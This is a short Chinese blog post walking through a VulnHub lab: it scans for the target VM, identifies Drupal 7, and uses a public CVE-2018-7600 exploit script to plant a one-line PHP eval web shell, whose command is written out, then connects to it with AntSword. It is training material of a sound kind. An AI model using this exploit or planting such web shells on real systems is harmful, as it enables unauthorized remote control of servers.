🏘️个人主页： 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

环境搭建

进入vulnhub官网 https://vulnhub.com 下载镜像

在虚拟机中打开镜像文件



设置虚拟机网络适配器
检查虚拟机网络适配器是否选择的NAT模式，不是的话改成NAT模式。

漏洞复现

1. 攻击机使用arp-scan -l命令查找靶机ip
   

2. 对整个网段的主机进行扫描 nmap 192.168.64.132/24
   发现靶机（192.168.64.132）的80和22端口开放
   

3. 访问 80 端口，出现ubuntu默认界面

4. 对该域名进行扫描，发现url

5. 访问该url，发现是一个登陆页面

6. 通过Wappalyzer插件知道其管理系统为Drupal 7

7. 搜索发现Drupal的历史漏洞，在gethub：https://github.com/pimps/CVE-2018-7600中找到Drupal 7 的漏洞利用脚本

8. 上传phpinfo()

9. 上传一句话木马，成功getshell

 -c "echo '<?php @eval($_POST['cmd']); ?>' > 4.php"

10. 用蚁剑远程登陆